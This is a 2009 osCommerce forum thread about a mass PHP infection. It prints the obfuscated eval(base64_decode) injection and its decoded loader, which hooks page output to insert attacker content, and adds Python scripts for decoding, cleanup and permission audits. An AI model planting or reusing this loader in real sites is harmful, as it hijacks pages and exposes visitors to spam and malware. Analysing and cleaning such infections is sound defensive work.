Weedwaka Posted September 5, 2009 Share Posted September 5, 2009 I was doing some updating on my site and I noticed some strange code appearing in all of my php files at the top. What is this? I sure as hell did not put it there. Should I erase it all? Can I tell when it was added?
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc HcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy 9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9 pcHcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdl cy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb 25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbi BnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzM wODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz Mjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBM jA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEOD ZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFI yMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNG QzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDR DFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMz kzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3Qjd BN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4 LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENER ThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT QxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Q xQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5 N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxM EVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQU RDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTV CNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRE NzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBN UI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1ME FFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzN FMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMy RjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2Q zczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJy QxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21 sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319 fQ==')); ?>
germ Posted September 5, 2009 Share Posted September 5, 2009 click this If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
germ Posted September 5, 2009 Share Posted September 5, 2009 I decoded it and it tells you where one of the hacker's files is:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php')){include_once('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}
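What germ did by hand above (decode the blob, read off the path of the dropped file) can be done safely in a script that never executes the decoded PHP. The following is an added example, not code from the thread or from osCommerce; it assumes nothing beyond the Python standard library, and the sample it analyses is a constructed, harmless stub shaped like the real prefix, with a made-up path.

```python
"""Decode an eval(base64_decode('...')) prefix without executing it,
and list the files the hidden code refers to."""
import base64
import re

# The injected one-liner: eval(base64_decode('<blob>')). The blob class admits
# whitespace because a pasted post (like the one above) wraps it with spaces.
INJECT_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.DOTALL,
)

# PHP calls whose string argument points at another component of the dropper
PATH_CALL_RE = re.compile(
    r"\b(include_once|include|require_once|require|file_exists|fopen|fwrite)"
    r"\s*\(\s*['\"]([^'\"]+)['\"]",
)


def decode_payload(blob: str) -> str:
    """Return the PHP hidden in a base64 blob as text, without running it."""
    # b64decode(validate=False) discards characters outside the alphabet, so the
    # spaces inserted by forum line-wrapping do not break decoding.
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def decode_injections(php_source: str) -> list:
    """Find every eval(base64_decode(...)) in a PHP file and decode each one."""
    return [decode_payload(m.group(1)) for m in INJECT_RE.finditer(php_source)]


def referenced_paths(decoded_php: str) -> list:
    """Paths the decoded code includes, tests or writes: these are the other
    pieces of the infection and must be inspected and removed as well."""
    return [path for _call, path in PATH_CALL_RE.findall(decoded_php)]


def analyse(php_source: str) -> dict:
    """Full report for one file: number of injections, decoded bodies, paths."""
    bodies = decode_injections(php_source)
    paths = sorted({p for body in bodies for p in referenced_paths(body)})
    return {"injections": len(bodies), "decoded": bodies, "paths": paths}


# Constructed sample (NOT the real payload): a loader-style stub with the same
# shape as the one in the thread, encoded the same way and wrapped like a post.
SAMPLE_HIDDEN = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
    "if(file_exists('/home/example/public_html/admin/images/style.css.php')){"
    "include_once('/home/example/public_html/admin/images/style.css.php');}}"
)
_blob = base64.b64encode(SAMPLE_HIDDEN.encode()).decode()
_wrapped = " ".join(_blob[i:i + 76] for i in range(0, len(_blob), 76))
SAMPLE_PHP = (
    "<?php /**/eval(base64_decode('" + _wrapped + "')); ?>\n"
    "<?php echo 'original shop code'; ?>\n"
)

if __name__ == "__main__":
    report = analyse(SAMPLE_PHP)
    print(f"{report['injections']} injection(s) found")
    for body in report["decoded"]:
        print("decoded:", body)
    print("referenced paths:", report["paths"])
```

Feed `analyse()` the text of any infected file and the `paths` list tells you what else to go looking for; nothing in the decoded string is ever evaluated, so the analysis is safe to run on a workstation.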
♥FIMBLE Posted September 5, 2009 Share Posted September 5, 2009 I found a very similar script in admin / fckeditor / editor / filemanager / browser / default / images / icons / 32 / sytle.css.php in someone's site last week, another good reason why people need to increase security, at the very least change the admin folder name. Sometimes you're the dog and sometimes the lamp post My Contributions
Weedwaka Posted September 7, 2009 Author Share Posted September 7, 2009 Thanks for the replies. You were correct on the file being the hacker's. I deleted it and cleaned the other files, however now I am having some problems. I can't log into my admin at all. Nothing comes up. I am getting the old permissions warning on the includes/configure.php file which is set to 444 and I can't figure out why. Aaarg !!! Why are people such douche bags ?? Any help with these problems would be greatly appreciated.
♥FIMBLE Posted September 7, 2009 Share Posted September 7, 2009 This kind of hack usually writes to EVERY php file on your account, you will need to make sure that they all are clean. I expect that your host has error reporting off, so you will need to view your server error logs or read this article click me to get the code to add
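Checking "every php file on your account", as FIMBLE says, is a job for a script rather than an editor. The block below is an added example, not code from the thread or from osCommerce: it walks a web root, lists each .php file whose first bytes are the injected prefix together with its modification time (a mass infection shows up as one minute holding nearly all the hits), and strips the prefix while keeping a .bak copy. The prefix pattern is the one visible in the first post; the sample tree it builds is constructed, with a harmless made-up blob.

```python
"""Find and strip an injected eval(base64_decode(...)) prefix from .php files."""
import base64
import os
import re
import shutil
import tempfile
import time

# Opening tag, optional /**/ spacer, eval(base64_decode('...')); closing tag,
# and the line break that follows, matched as bytes so non-UTF-8 files survive.
PREFIX_RE = re.compile(
    rb"^<\?php\s*(?:/\*.*?\*/)?\s*eval\s*\(\s*base64_decode\s*\(\s*"
    rb"['\"][A-Za-z0-9+/=\s]+['\"]\s*\)\s*\)\s*;\s*\?>[ \t]*\r?\n?",
    re.DOTALL,
)


def is_infected(path: str) -> bool:
    with open(path, "rb") as fh:
        head = fh.read(8192)            # the prefix sits at the very top
    return PREFIX_RE.match(head) is not None


def scan_tree(root: str) -> list:
    """(path, mtime) for every .php file under root that carries the prefix."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                if is_infected(full):
                    hits.append((full, os.path.getmtime(full)))
    return sorted(hits)


def cluster_by_minute(hits: list) -> dict:
    """Count hits per modification minute; one dominant bucket means one
    automated pass, which is what the posters in this thread observed."""
    buckets = {}
    for _path, mtime in hits:
        key = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        buckets[key] = buckets.get(key, 0) + 1
    return buckets


def clean_file(path: str) -> bool:
    """Strip the prefix in place, keeping <path>.bak. True if the file changed."""
    with open(path, "rb") as fh:
        original = fh.read()
    cleaned, n = PREFIX_RE.subn(b"", original, count=1)
    if n == 0:
        return False
    shutil.copy2(path, path + ".bak")   # evidence and rollback
    with open(path, "wb") as fh:
        fh.write(cleaned)
    return True


# Constructed sample tree: two infected files and one clean one.
SAMPLE_BLOB = base64.b64encode(b"echo 'constructed stub';").decode()
INJECTED = ("<?php /**/eval(base64_decode('" + SAMPLE_BLOB + "')); ?>\n").encode()
CLEAN_BODY = b"<?php\n// original shop file\necho 'hello';\n"


def build_sample_tree(root: str) -> None:
    os.makedirs(os.path.join(root, "admin"))
    os.makedirs(os.path.join(root, "catalog"))
    for rel, body in (("admin/index.php", INJECTED + CLEAN_BODY),
                      ("catalog/index.php", INJECTED + CLEAN_BODY),
                      ("catalog/ok.php", CLEAN_BODY)):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)


def demo() -> dict:
    """Build the sample tree in a temp dir, scan, clean, and report."""
    root = tempfile.mkdtemp()
    try:
        build_sample_tree(root)
        hits = scan_tree(root)
        before = [os.path.relpath(p, root) for p, _ in hits]
        clustered = sum(cluster_by_minute(hits).values())
        changed = sum(clean_file(p) for p, _ in hits)
        with open(os.path.join(root, "admin", "index.php"), "rb") as fh:
            restored = fh.read()
        return {"before": before, "clustered": clustered, "changed": changed,
                "after": len(scan_tree(root)), "restored": restored,
                "backup": os.path.exists(os.path.join(root, "admin", "index.php.bak"))}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

Run `scan_tree()` first and review the list before calling `clean_file()`; the .bak copies keep the infected originals so the timestamps and payload are still available if you later get hold of the access logs.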
Weedwaka Posted September 7, 2009 Author Share Posted September 7, 2009 If anybody wants the information from that file, I can email it. It is too long to post.
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 Yup, me too! Same identical signature. Almost every php file within the osCommerce hierarchy. /admin, /catalog. All with the same time stamp of Sep 04 2009 07:36 PST. This is an automated hack. It finds you, embeds itself, and spreads itself around. This appears very similar to one I saw last year. I contacted my hosting provider, and they said there was nothing they could or would do. "Try osCommerce. It's their code vulnerabilities. Fix the scripts." This is one of the reasons I went through the trouble of moving to a new hosting service, and upgrading to the v2.2 RC2a. The previous version had some security issues. Apparently, so does this one. I am about done with trying to clean up my site on a weekly basis. Only to have this garbage re-infecting my site again and again.
Weedwaka Posted September 7, 2009 Author Share Posted September 7, 2009 What is the purpose of this code?
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 I haven't followed all of the logic in this one, but if it is similar to the hack from last year, it embeds the eval stuff at the front of every php file. Which then runs more scripts that have been buried deeper within your file system. I found these in /admin/includes/languages/english/modules/index
cnf
csi
customers.php
dg.php
lock
orders.php
s.php
skwd
style.css.php
style.css.php.orig
swf
Only two of which are my original files: customers.php and orders.php.
cnf: ASCII text
csi: ASCII text
dg.php: PHP script text
lock: empty
s.php: PHP script text
skwd: ASCII text, with CRLF line terminators
style.css.php: PHP script text
style.css.php.orig: PHP script text
swf: Macromedia Flash data (compressed), version 9
csi has an IP address and a UNIX time stamp. The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland. The file skwd is a list of random search words:
tramadol blackjack craps onlinecasino propecia pokerstars fulltiltpoker gambling casino casinos alprazolam soma ambien cialis ultram viagra fioricet xanax fiericet slot baccarat carisoprodol keno muscle valium deposit deposits levitra zoloft acomplia acyclovir betting realtytrac intercasino zithromax diazepam sildenafil tadalafil valtrex
No doubt to be used by Google and other search engines to be linked back to your site, at locations that have nothing to do with your ecommerce content. Last time, it was some porno sites in China and Russia. And visitors to your site will now be the happy beneficiaries of virii. I received threats from people saying that I was a porno spammer. Sheesh. But this variation is much more sophisticated. The prior version was not nearly as prolific, or buried as deep. I am still faced with the prospect of re-uploading my entire site contents, and resetting all of the directory and file permissions. Hours and hours. And without some reassurance that the vulnerabilities will be fixed in the next six months, I am forced to make the decision to either check the site daily, or to find a new ecommerce solution.
Guest Posted September 7, 2009 Share Posted September 7, 2009 It got me as well on two sites. Siteground want $50 to fix it or $150 for a 99.9% solution. What I cannot fathom is what they get out of it!!
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 The hackers get tons of traffic sent to their sites via your server. It is virtually untraceable. And self replicating. This thing could have been sent out months ago. As it finds more sites that support php (osCommerce, specifically), it knows precise vulnerabilities. It is our job to figure out how, and to block yet another hole. But don't expect your service provider's tech support to offer you anything more than README files, and a more expensive solution. That's exactly what I want to do with my next two weeks: Start all over again with yet another eCommerce package, customizing the cosmetics, developing a new database of products, and finding another hosting company. Oh joy.
Giovanna Posted September 7, 2009 Share Posted September 7, 2009 Why do all that when you can follow the instructions on how to secure your site in the tips and tricks section. Your host cannot help if you don't make sure your installation is protected. Main thing is to rename your admin and protect it via your host panel. Read the tips and tricks section, it is full of information on how to protect yourself and your customers.
Giovanna Posted September 7, 2009 Share Posted September 7, 2009 http://www.oscommerce.com/forums/index.php?showtopic=313323 The direct link to the secure your site info.
germ Posted September 7, 2009 Share Posted September 7, 2009 Yup, me too! Same identical signature. Almost every php file within the osCommerce hierarchy. /admin, /catalog. All with the same time stamp of Sep 04 2009 07:36 PST. This is an automated hack. It finds you, embeds itself, and spreads itself around. This appears very similar to one I saw last year. I contacted my hosting provider, and they said there was nothing they could or would do. "Try osCommerce. It's their code vulnerabilities. Fix the scripts." This is one of the reasons I went through the trouble of moving to a new hosting service, and upgrading to the v2.2 RC2a. The previous version had some security issues. Apparently, so does this one. I am about done with trying to clean up my site on a weekly basis. Only to have this garbage re-infecting my site again and again. I'd have to disagree. It's been my observation that more often than not it's usually because of the way the site is setup and NOT the software behind it. The site I manage isn't even running the latest V2 of osC and in the 2+ years we've been on the net we've only had two minor "bumps in the road". My observation has been that over 90% of the sites that get hacked are because they have a folder (/images or /catalog/images or /admin/backups usually) set with 777 permissions. It is an undeniable truth that if you have a FOLDER with 777 permissions, because of the way most servers are set up, it's usually only a matter of time before you get hacked. Not IF, just WHEN and HOW BAD. Folder permissions should NEVER be higher than 755 - EVER. These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.
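germ's rule (no folder above 755, and in practice no file writable by group or other) is easy to check and enforce across a whole account. The script below is an added example, not from the thread or from osCommerce: it audits a web root against that policy, skipping symlinks so nothing outside the tree is touched, and can tighten the offending modes in place. The demo tree it builds in a temporary directory is constructed, with an /images folder deliberately set to 777 and a configure.php set to 666, the two mistakes this thread keeps circling.

```python
"""Audit a web root for over-permissive modes and tighten them."""
import os
import shutil
import stat
import tempfile

DIR_ALLOWED = 0o755       # folders: never more than rwxr-xr-x
WRITE_BY_OTHERS = 0o022   # files: no group or other write bit


def _mode(path: str) -> int:
    return stat.S_IMODE(os.lstat(path).st_mode)


def audit(root: str) -> list:
    """(path, mode) for directories with bits beyond 755 and files writable by
    group/other. Symlinks are skipped: chmod through one changes its target."""
    entries = [(root, True)]
    for dirpath, dirs, files in os.walk(root):
        entries += [(os.path.join(dirpath, d), True) for d in dirs]
        entries += [(os.path.join(dirpath, f), False) for f in files]
    findings = []
    for path, is_dir in entries:
        if os.path.islink(path):
            continue
        mode = _mode(path)
        excess = (mode & ~DIR_ALLOWED) if is_dir else (mode & WRITE_BY_OTHERS)
        if excess:
            findings.append((path, mode))
    return sorted(findings)


def tighten(root: str) -> int:
    """Clear only the offending bits (755 cap on dirs, no g/o write on files).
    Returns the number of entries changed."""
    changed = 0
    for path, mode in audit(root):
        if os.path.isdir(path):
            new_mode = mode & DIR_ALLOWED
        else:
            new_mode = mode & ~WRITE_BY_OTHERS
        os.chmod(path, new_mode)
        changed += 1
    return changed


def demo() -> dict:
    """Constructed tree: one 777 folder, one 666 file, one correct 644 file."""
    root = tempfile.mkdtemp()
    try:
        images = os.path.join(root, "images")
        os.mkdir(images)
        os.chmod(images, 0o777)                 # the classic mistake
        config = os.path.join(root, "configure.php")
        index = os.path.join(root, "index.php")
        for path in (config, index):
            with open(path, "w") as fh:
                fh.write("<?php // constructed placeholder ?>\n")
        os.chmod(config, 0o666)
        os.chmod(index, 0o644)
        before = len(audit(root))
        fixed = tighten(root)
        return {"before": before, "fixed": fixed, "after": len(audit(root)),
                "images_mode": _mode(images), "config_mode": _mode(config),
                "index_mode": _mode(index)}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    r = demo()
    print(f"findings before: {r['before']}, fixed: {r['fixed']}, after: {r['after']}")
    print(f"images -> {r['images_mode']:o}, configure.php -> {r['config_mode']:o}")
```

On a real account run `audit()` on the document root first and read the list; `tighten()` only clears the excess bits, so a 644 file or a 755 folder is left exactly as it was, and an owner-only 600 configure.php stays 600.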
blueflametuna Posted September 7, 2009 Share Posted September 7, 2009 Thank you for your observation. But there are no folders or files with permissions higher than 755. Most are 644. There are absolutely no files or folders now, or in the past that were ever set to 777. This was the first thing I checked then, and is something I have just verified again now. Yours is an easy and obvious suggestion, but not valid in this case. The files are owned by my account, and the server runs with my ownership permissions. The software is permitting the server to overwrite my own files in place, then executing them. It does not need "other" write permissions if it can run as the "owner". I submit that there ARE vulnerabilities in the code, and that even with "best practices" and a secure server, these hackers are able to circumvent this and do their evil. They are not logging in, they are not using FTP. These are self-modifying scripting tactics, through some form of an input validation bypass, or form processing technique.
germ Posted September 8, 2009 Share Posted September 8, 2009 Then you are among the minority. Security is only as strong as the weakest link. There are a lot of relatively new FTP viruses that can infect your PC, and through that gain access to your site. If your PC is compromised (and most people can't tell) then your site may be as well. And just because you have an up-to-date antivirus running doesn't necessarily mean your PC is "clean". I used to do a lot of help/posting on an anti-virus/anti malware removal site. Most everyone that had a virus I saw also had an up-to-date antivirus running. I never could figure that one out. There are a few contributions that have known security issues that I have seen. And there might be unknown flaws in the base code. I'm not saying it's immune. I really don't know. My experience is that it's the inexperience of most site owners/operators that leads to problems like this more times than not.
blueflametuna Posted September 8, 2009 Share Posted September 8, 2009 Like I said, they did not login, and they did not use FTP to "upload" new files. The files were edited in place by prepending the one line <?php eval(base64_decode ... to nearly 1,000 files at once. This has nothing to do with a virus on my PC. It has only to do with a vulnerability within the osCommerce software that they are able to take advantage of. In the previous version, they used global variables. I upgraded to rc2a so that it would no longer use them. Now there is something new, but I suspect, very similar in its design. Unfortunately, I do not have archives of the access logs, so I cannot prove it, nor enough real-time data to pursue a forensics investigation. I am not a newbie. (Or is it NOOB these days?) I do not even attempt to keep up with the current vernacular, or local colloquialisms of new age netiquette. But I can still find my way around a keyboard, and navigate through thousands of lines of code, if need be. It is just frustrating that I should need to. It's a shopping cart app.
germ Posted September 8, 2009 Share Posted September 8, 2009 And until you have access to the server logs, and can prove someone was in a particular osC file with a particular URL and did such-and-such (SQL injection or whatever), the real cause is still unknown. Any "finger pointing" at this point in time is mere conjecture. I've only had two minor "blurps" in two and a half years, and they were my fault. It seems to work for the site I manage so I'm staying.
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I am very much a newbie at php. I probably did leave a door open somewhere for this weenie to get in. I am still trying to get my site back up and running because of this crap =/
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I haven't followed all of the logic in this one, but if it is similar to the hack from last year, it embeds the eval stuff at the front of every php file. Which then runs more scripts that have been buried deeper within your file system. I found these in /admin/includes/languages/english/modules/index
cnf
csi
customers.php
dg.php
lock
orders.php
s.php
skwd
style.css.php
style.css.php.orig
swf
Only two of which are my original files: customers.php and orders.php.
cnf: ASCII text
csi: ASCII text
dg.php: PHP script text
lock: empty
s.php: PHP script text
skwd: ASCII text, with CRLF line terminators
style.css.php: PHP script text
style.css.php.orig: PHP script text
swf: Macromedia Flash data (compressed), version 9
csi has an IP address and a UNIX time stamp. The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland. The file skwd is a list of random search words:
tramadol blackjack craps onlinecasino propecia pokerstars fulltiltpoker gambling casino casinos alprazolam soma ambien cialis ultram viagra fioricet xanax fiericet slot baccarat carisoprodol keno muscle valium deposit deposits levitra zoloft acomplia acyclovir betting realtytrac intercasino zithromax diazepam sildenafil tadalafil valtrex
No doubt to be used by Google and other search engines to be linked back to your site, at locations that have nothing to do with your ecommerce content. Last time, it was some porno sites in China and Russia. And visitors to your site will now be the happy beneficiaries of virii. I received threats from people saying that I was a porno spammer. Sheesh. But this variation is much more sophisticated. The prior version was not nearly as prolific, or buried as deep. I am still faced with the prospect of re-uploading my entire site contents, and resetting all of the directory and file permissions. Hours and hours. And without some reassurance that the vulnerabilities will be fixed in the next six months, I am forced to make the decision to either check the site daily, or to find a new ecommerce solution.
Interestingly enough, I found most of these in the admin/includes/languages/english/images/buttons folder and not the modules/english folder. I still have not found the style.css.php and style.css.org.php files you mentioned. Thanks for the heads up !!
i2Paq Posted September 8, 2009 Share Posted September 8, 2009 I find it strange that if you have directory-access control on your admin directory they still manage to get in your admin files. If you are on a shared server it could also be related to the fact that the security on that shared server sucks or that one of the sites on that shared server has issues. Norman in 't Veldt Moderator osCommerce The Netherlands
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 I seem to have most of this back up now but I can't log into my admin? Any ideas?
Weedwaka Posted September 8, 2009 Author Share Posted September 8, 2009 It does not load up at all . . . just a blank page =/